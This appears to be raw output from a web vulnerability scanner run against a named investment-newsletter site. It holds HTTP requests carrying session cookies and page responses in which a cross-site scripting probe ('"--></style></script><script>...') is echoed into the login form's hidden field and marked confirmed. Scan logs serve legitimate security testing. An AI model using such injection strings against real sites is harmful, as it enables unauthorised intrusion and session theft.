Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/div/index.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12205
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 23333
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>S&A Dividend Grabber Investment Report and Newsletter</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The Dividend Grabber uses companies that have recently paid special dividends to guide your investment strategy.">
<meta name="keywords" content="dividend investments, investment dividends, dividend investment strategy, dividend paying stocks, high dividend stocks, stock investments, investment research, stock newsletter">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/div";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/div_title_sm.gif" alt="S&A Dividend Grabber" width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p><font size="2"><em><font face="Verdana, Arial, Helvetica, sans-serif">S&amp;A Dividend Grabber </font></em><font face="Verdana, Arial, Helvetica, sans-serif">is our most foolproof way to make money. </font></font&g..
- /pub/fda/

/pub/fda/ CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/digest/archive/2008/html/fda_essays.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/fda/ HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/fda/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12205
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
